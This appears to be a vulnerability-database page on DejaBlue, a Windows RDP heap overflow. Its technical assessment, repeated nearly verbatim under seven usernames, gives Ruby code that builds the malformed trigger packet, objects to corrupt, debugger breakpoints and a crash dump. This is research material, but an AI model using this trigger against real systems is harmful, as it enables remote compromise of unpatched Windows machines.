Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
attackerkbAttackerKBAKB:3C6D4A84-B8EE-47A2-A1E9-388F5F32AD27
HistoryAug 14, 2019 - 12:00 a.m.

DejaBlue, RDP Heap Overflow

2019-08-1400:00:00
attackerkb.com
208

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

JSON

A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems Remote Desktop Service via RDP.

The update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.

Recent assessments:

zeroSteiner at November 14, 2019 5:12pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it

  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances

  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

busterb at August 13, 2019 5:48pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it

  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances

  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

bwatters-r7 at August 22, 2019 10:14pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it

  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances

  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

sgonzalez-r7 at August 26, 2019 4:32pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it

  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances

  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

space-r7 at August 19, 2019 7:17pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it

  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances

  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

wvu-r7 at August 22, 2019 10:37pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it

  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances

  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

ccondon-r7 at September 13, 2019 8:20pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it

